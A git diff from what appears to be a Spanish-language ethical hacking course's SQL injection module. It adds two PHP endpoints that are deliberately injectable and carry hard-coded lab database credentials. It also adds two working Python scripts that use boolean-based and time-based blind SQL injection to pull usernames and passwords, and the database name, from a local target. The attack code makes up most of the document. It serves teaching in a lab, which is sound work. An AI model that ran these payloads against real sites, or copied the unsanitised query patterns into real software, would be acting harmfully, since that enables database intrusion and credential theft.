Add Tema 6 - SQL Injection

Introduccion-hacking-hack4u/tema_6_owasp/01_sqli/searchUsers.php

@@ -0,0 +1,19 @@
+<?php
+
+  $server = "localhost";
+  $username = "s4vitar";
+  $password = "s4vitar123";
+  $database = "Hack4u";
+
+  // Establecer conexión
+  $conn = new mysqli($server, $username, $password, $database) or die(mysqli_error($conn));
+
+  $id = $_GET['id'];
+
+  $data = mysqli_query($conn, "select username from users where id = '$id'");
+
+  $response = mysqli_fetch_array($data);
+
+  echo $response['username'];
+
+?>

Introduccion-hacking-hack4u/tema_6_owasp/01_sqli/searchUsers2.php

@@ -0,0 +1,21 @@
+<?php
+
+  $server = "localhost";
+  $username = "s4vitar";
+  $password = "s4vitar123";
+  $database = "Hack4u";
+
+  // Establecer conexión
+  $conn = new mysqli($server, $username, $password, $database);
+
+  $id = mysqli_real_escape_string($conn, $_GET['id']);
+
+  $data = mysqli_query($conn, "select username from users where id = $id");
+
+  $response = mysqli_fetch_array($data);
+
+  if(!isset($response['username'])){
+    http_response_code(404);
+  }
+
+?>

Introduccion-hacking-hack4u/tema_6_owasp/01_sqli/sqli.py

@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+"""
+Script de Inyección SQL
+"""
+import requests
+import signal
+import sys
+import time
+import string
+
+from pwn import *
+
+
+def signal_handler(signal, frame):
+    """
+    Salir con Ctrl+C
+    """
+    print('Saliendo con Ctrl+C!')
+    sys.exit(0)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+# Variables globales
+main_url = "http://192.168.1.121/searchUsers2.php"
+characters = string.printable
+
+
+def makeSQLI():
+
+    p1 = log.progress("Fuerza bruta")
+    p1.status("Fuerza bruta en proceso")
+
+    time.sleep(2)
+
+    p2 = log.progress(f"Datos extraídos:\n\t")
+
+    extracted_info = ""
+
+    for position in range(1, 67):
+
+        for character in range(33, 126):
+
+            sqli_url = main_url + \
+                "?id=9 or (select(select ascii(substring((select group_concat(username,0x3a,password) from users),%d,1)) from users where id = 1)=%d)" % (
+                    position, character)
+
+            p1.status(
+                f"\n[i] Probando posición {position} el carácter: {chr(character)}")
+
+            r = requests.get(sqli_url)
+
+            if r.status_code == 200:
+                extracted_info += chr(character)
+                p2.status(extracted_info)
+                break
+
+
+if __name__ == "__main__":
+    makeSQLI()

Introduccion-hacking-hack4u/tema_6_owasp/01_sqli/sqli_time.py

@@ -0,0 +1,65 @@
+#!/usr/bin/env python
+"""
+Este script realiza una inyección SQL de tipo Time-Based Blind SQL Injection
+"""
+import requests
+import signal
+import sys
+import time
+import string
+
+from pwn import *
+
+
+def signal_handler(signal, frame):
+    """
+    Salir con Ctrl+C
+    """
+    print('Saliendo con Ctrl+C!')
+    sys.exit(0)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+# Variables globales
+main_url = "http://192.168.1.121/searchUsers2.php"
+characters = string.printable
+
+
+def makeSQLI():
+
+    p1 = log.progress("Fuerza bruta")
+    p1.status("Fuerza bruta en proceso")
+
+    time.sleep(2)
+
+    p2 = log.progress(f"Datos extraídos")
+
+    extracted_info = ""
+
+    for position in range(1, 10):
+
+        for character in range(33, 126):
+
+            sqli_url = main_url + \
+                "?id=1 and if(ascii(substr(database(),%d,1))=%d,sleep(0.35),1)" % (
+                    position, character)
+
+            p1.status(
+                f"\n[i] Probando posición {position} el carácter: {chr(character)}")
+
+            time_start = time.time()
+
+            r = requests.get(sqli_url)
+
+            time_end = time.time()
+
+            if time_end - time_start > 0.35:
+                extracted_info += chr(character)
+                p2.status(extracted_info)
+                break
+
+
+if __name__ == "__main__":
+    makeSQLI()